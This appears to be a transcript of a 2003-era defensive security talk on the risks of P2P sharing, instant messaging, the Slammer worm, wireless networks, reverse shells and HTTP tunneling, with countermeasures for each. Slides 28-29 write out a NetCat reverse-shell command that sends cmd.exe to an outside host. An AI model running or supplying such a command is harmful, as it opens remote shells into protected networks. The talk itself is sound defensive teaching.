Analysts International Stuff to Worry About in Computer Security A.K.A. “Firewall? I laugh at your puny firewall” V1.0 10-0802
Analysts International Stuff to Worry About in Computer Security A.K.A. “Firewall? I laugh at your puny firewall” V1.0 10-0802.
Dec 26, 2015
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Analysts International
Stuff to Worry About in Computer Security
A.K.A. “Firewall? I laugh at your puny firewall”
V1.0 10-0802
2
Introductions• Mark Lachniet from Analysts International,
Sequoia Services Group• Senior Security Engineer and Security
Services technical lead• Former I.S. director for Holt Public Schools • Certified Information Systems Security
Professional (CISSP)• Microsoft MCSE, Novell Master CNE, Linux
LPI Certified LPIC-1, Check Point Certified CCSE, etc.
3
Agenda
• Peer to Peer file sharing
• Instant Messaging
• Slammer (just for fun)
• Wireless
• Reverse command shells
• HTTP Tunneling / GoToMyPC.com
• Round table – Q&A – Brainstorming
4
Peer to Peer File Sharing
• Several different networks and clients:• Aimster• FastTrack• iMesh• Audiogalaxy• MFTP • NeoModus • Gnutella• OpenNap
5
Peer to Peer File Sharing• The most popular network by far is Gnutella• Gnutella has many different clients including:
• BearShare*• Gnucleus • GTK-Gnutella • LimeWire • Mactella • Morpheus*• Phex • Qtella • Shareaza*• XoLoX
• Different clients have different features, systems and risks
6
P2P File Sharing History• Napster was the first successful and important
one, but napster made one mistake• Napster used centralized servers that were
under their control• Hence the system could be shut down by going
after Napster with legal action• Newer systems have “master” nodes, but all
they do is maintain lists of other peers out on the network
• Master nodes are replaceable – you could start your own P2P network by setting up your own master servers
7
Napster-Style P2P
• This wasn’t too bad, at least you knew what to block
8
Gnutella Style P2P
• This is *bad* for you because there is no single choke point to cut off
9
P2P File Share Features• Keyword searching• Rate limiting / Quality of Service (via bandwidth
or simultaneous upload and download limits)• Request queuing at the serving host• Chat facilities• Use SHA hashes of files to uniquely ID:
– SHA hashes are unique by file– ID’s files that are the same but have different names– Allows for “swarm” downloads where parts of the same file are
downloaded from multiple sources simultaneously (cool)– Allows for file resumption if a source is unavailable (turned off,
hung up, etc.)– Allows for a patient person to get almost anything they can find
listed
10
Gnutella Communications• Uses 5 distinct types of protocol messages: ping, pong,
query, query reply, and push• Use Shareaza to get a good protocol analyzer / decoder
to see them• Ping and Pong discovery – ask who is out there, return
IP address and amount of shared files• Query and Query reply – gives search terms
(keywords) and minimum bandwidth requirements. Reply gives IP address, port, speed, matching files and GUID of querier
• Querier then connects to the server and attempts to download the file (this will break if the server is behind a firewall)
• The Push message is sent if the querier cannot connect to the server to download the data
11
Push – Firewall Circumvention• Sends the querier’s IP and port number and asks the
file host to push the file to it – this will bypass a single firewall in the mix
• If both parties are behind a firewall you are probably safe… For now…
• How can you stop it? Use a firewall to block *all* outgoing communications
• Require a proxy server to mediate all requests outwards (Squid, MS-PROXY, Border Manager)
• Its only a matter of time before P2P clients can tunnel within HTTP requests that are “proxy friendly”
• Can already be done with special (but thankfully complicated HTTP tunneling software)
• For Gnutella, you can block the “root” servers but an alternate could always be used
12
P2P File Share Security Risks• Spyware Spyware Spyware!• Usually no virus scanning is done – you need to do
your own• Spoofed servers will cough up Trojans for almost any
simple query (like the Benjamin Worm)• Sharing of more than you intended• “transit” sharing of naughty files has been hinted at!• Security holes (intentional or not) in the software
itself• Program minimizes (not shuts down) when exited• P2P specific worms (e.g. the “Gnutella Worm”)• Content problems and liability! • Bandwidth leeching
13
Future P2P Risks• A lot of things about P2P are “dicey” but haven’t yet
been exploited• For example, the GUID is a unique identifies that is
sometimes based on MAC address! (pre win2k it is said)
• That means that queries can be tracked to a workstation
• A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc)
• Great possibility for leveraging P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov)
14
P2P “NG” Share Sniffer• Operates under the creed of “who needs
Napster when you have Windows”• Scans a subnet for “open” windows shares
and create a database of them• These open shares are then used as the
storage repositories for various types of files• This product used to be at sharesniffer.com
but is gone now. I wonder why• This was allegedly going to be a pay service! • Due the lack of awareness on the part of home
users, this will probably work quite well
15
Instant Messaging• IM is everywhere, including my cell phone!
(although I don’t use it)
• Over 81 MILLION users
• Check out:• http://www.infosecuritymag.com/2002/aug/cover.shtml
• Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc.
• Specifically designed to get around firewalls in order to work
• Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers)
16
17
Problems with IM• Bypasses gateway AntiVirus products• Typically unencrypted• Security problems in the software itself -many
previous hacks, probably many more to come• May allow remote-control of machines inside the
firewall• Ability to send files, URLs, etc. to individuals• Hard to stop at the firewall• Hard to track, log and account for• No robust authentication systems• Secure IM costs $$ and may require an ongoing
service contract or your own server• May be a covered medium under CIPA????
18
Instant Messaging ProblemsCase in Point - msgsnarf
• Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff
• These are especially interesting because of their special features!
• One feature is that it will work on a switch by using “ARP poisoning” such that even switched networks are vulnerable to sniffing
• Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information)
• This might have a “white-hat” application, actually, if you need to monitor it
19
IM management Techniques• Use an IDS to alert you to matching traffic
(and then go slap the user)• Block access to the login servers and ports
(refer to infosecurity magazine’s August issue for details)
• Tightly control the workstation using imaging and desktop security products
• Require the use of proxy servers (only works in some cases – disable CONNECT on proxy)
• Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software
20
Slammer• Hit in late January, 2003• Known as Slammer or Sapphire• Was the fastest spreading worm ever• Took 10 minutes to cross the globe• Doubled the # of infected systems every 8.5
seconds in the first minute (compared to Code Red, which doubled every 37 minutes)
• Took advantage of an old security bug in Microsoft SQL server
• Especially hard hit were those with Microsoft’s MSDE – a desktop version of SQL server
21
Slammer• Many people who had patched their SQL servers
with the proper patch were still hit because of MSDE
• MSDE ships with a variety of products, including versions of Visio, Microsoft Visual Studio, etc.
• Took advantage of the fact that SQL server runs with admin privileges
• Hence attacks on SQL servers are very dangerous – if they succeed, you can run code of your choice as admin
• The entire worm was fit into a single UDP packet of less than 1k!
22
Wireless• If you haven’t yet heard that wireless is
insecure, you have probably been living in a cave and never get news of the outside world
• Yes, wireless is insecure…. Especially anything you purchased less than 6 months ago. Newer stuff is better
• Until recently, the only security that you could get from the wireless Access Points (APs) was Wired Equivalency Protection (WEP)
• WEP comes in 64bit and 128bit security features, neither of which will do you any good at all if someone really wants to get you
23
Wireless• Wardriving – its fun, its cheap, and your
students think its spiffy• Wireless leaks – connections can be made from
physical locations outside of your control by using special hardware and software
• Omnidirectional magnetic-mount antennas, directional antennas, and even pringles cans do a pretty good job of picking up signals you never thought possible
• Not only can anyone find your network, but they can (probably) tell what your SSID is, if you use WEP, and what vendor your equipment is
24
Wireless• Above and beyond that, modern software
integrates with a GPS over a serial port to record the longitude and latitude of your AP
• When posted on the internet, your dirty laundry is aired out for all to see (*)
• Check out http://www.netstumbler.com for lots of great information
• Try it out yourself, you may be surprised• War driving is not, in itself, illegal! However,
if you ever use an AP without permission, that is over the line.
25
From Work to Home9 Access Points in 15 Minutes
26
Wireless Security Measures• There are a few things you can do• Put access points on a special DMZ segment on a
firewall and restrict traffic• Require users to use a VPN client to access internal
resources• Use a modern authentication system such as 802.1X (in
Windows XP) and/or LEAP • These systems can require a successful authentication
(for example to a Radius server) before allowing a user to associate with an access point
• Can also require MUTUAL authentication between the AP and client in addition to user authentication
• If this didn’t exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own “rogue” AP
27
Reverse Command Shells• One would think that if you block all
incoming access, it should be impossible to access internal systems
• This is only partially true, because it assumes that the client is honest
• With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded
• Reverse command shells, e.g. the NetCat attack are particularly scary
• Using a utility program such as NetCat, even a Windows server can be accessed from an outside server
28
How Reverse Shells Work
• Imagine the above scenario. Lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no direct Network Address Translation but the client has Internet access
The Internet
Firewall
Client Workstation10.20.30.40
Hacker Workstationlachniet.com
Client Workstation10.20.30.50
Laser printer10.20.30.70
10.20.30.60
29
How Reverse Shells Work
The Internet
Firewall
Client Workstation10.20.30.40
Hacker Workstationlachniet.com
Client Workstation10.20.30.50
Laser printer10.20.30.70
10.20.30.60
LISTEN ON 8080!
Send cmd.exeto lachniet.com 8080
• Hacker runs NetCat in Listen mode on port 8080 on lachniet.com (netcat –l –p 8080)
• Client runs NetCat with an argument of cmd.exe and directs all output to lachniet.com port 8080 (nc –e cmd.exe lachniet.com 8080)
30
How Reverse Shells Work
• The result – full access as logged in user• To stop it – no outgoing access! • Except by proxy server
31
HTTP Tunneling• It used to be that a firewall, when properly
configured, would stop clients from doing naughty things (like reverse command shells)
• Ideally we would block all outgoing access, and allow only web access through a HTTP proxy server
• This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and data, and then pass that data down to lower layers of the OSI model
• In this way, even the most paranoid countermeasures can be circumvented including a restrictive firewall and a proxy server
• Technically speaking, it looks something like this:
32
HTTP Tunneling in Practice
• Client wants to run a P2P file sharing client
• Dotted lines are HTTP traffic, Solid line is TCP
The Internet
Firewall
Proxy Server10.20.30.40
Hacker Workstationlachniet.com
Client Workstation10.20.30.50
Laser printer10.20.30.70
10.20.30.60
HTTP Tunnellistens ON 443SOCKS Serverlistens as well
Runs HTTP Tunnelclient and socks client
Gnutella Host
33
GoToMyPC.com• Basically the same thing, except you are using
a pay service for your HTTP tunnel termination
• The service also acts as a broker for who can connect to your PC
• Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines)
• You also get more control and presumably security through SSL, reporting, users and groups and such
34
HTTP Tunneling Counter-measures• Block *all* outgoing traffic at a firewall, and require all
traffic to go through a proxy server• Use a firewall with strict RFC compliance (I heard of some
reported success with Raptor/Symantec?)• Make sure your proxy server doesn’t allow the
CONNECT verb• Configure an IDS to sense certain types of HTTP
tunneling signatures (RealSecure can detect gotomypc.com traffic signatures)
• Block all known destination servers such as those from the gotomypc.com service
• Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn’t seem legit) check it out – go browse it yourself
• Log review may be your only recourse!
35
Q&A and Brainstorming Mark Lachniet
Sr. Security EngineerAnalysts International
Related Documents
